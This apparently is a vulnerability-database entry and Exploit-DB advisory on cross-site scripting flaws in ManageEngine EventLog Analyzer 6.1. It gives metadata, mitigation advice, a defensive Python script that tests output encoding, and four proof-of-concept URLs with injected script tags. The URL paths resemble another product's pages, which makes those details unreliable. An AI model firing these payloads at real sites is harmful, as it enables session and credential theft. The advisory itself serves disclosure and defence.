Vendor: EventLog Analyzer
By: Unknown
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-Site Scripting)
Product Name: EventLog Analyzer
Affected Version From: 6.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:manageengine:eventlog_analyzer:6.1
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Cross-Site Scripting Vulnerabilities in ManageEngine EventLog Analyzer

Multiple cross-site scripting vulnerabilities exist in ManageEngine EventLog Analyzer, allowing an attacker to execute arbitrary script code in the browser of a user visiting the affected site. This can lead to the theft of authentication credentials and enable further attacks.

Mitigation:

Ensure that user-supplied input is properly sanitized to prevent script code execution. Update to the latest version of ManageEngine EventLog Analyzer to mitigate these vulnerabilities.
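
The mitigation above, shown as an added example (not code from the advisory or from the vendor): the request URLs from the raw data further down this page are decoded, each parameter is reflected into an attribute once raw and once with output encoding, and an HTML parser reports which elements result. The `<input>` template and all function names are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

# Request URLs copied from the advisory text (example.com is its placeholder host).
ADVISORY_URLS = [
    "https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E",
    "https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
    "https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
    "https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
]

class TagCollector(HTMLParser):
    """Records the start tags an HTML parser sees in a rendered fragment."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def render(value, encode):
    # Hypothetical template: the parameter is reflected into an attribute value.
    if encode:
        value = escape(value, quote=True)  # encodes & < > " '
    return '<input type="hidden" name="p" value="%s"/>' % value

def tags_in(fragment):
    collector = TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags

def audit(urls, encode):
    """Return (path, parameter, parsed tags) for every reflected parameter."""
    rows = []
    for url in urls:
        parts = urlsplit(url)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            rows.append((parts.path, name, tags_in(render(value, encode))))
    return rows

if __name__ == "__main__":
    for encode in (False, True):
        print("encoded output" if encode else "raw output")
        for path, name, tags in audit(ADVISORY_URLS, encode):
            print("  %-22s %-4s %s" % (path, name, tags))
```

Encoding has to match the output context: `escape(..., quote=True)` covers quoted attribute values and element text, not values placed inside script blocks or URLs.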

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45334/info

ManageEngine EventLog Analyzer is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

ManageEngine EventLog Analyzer 6.1 is vulnerable; other versions may also be affected. 

https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E


https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E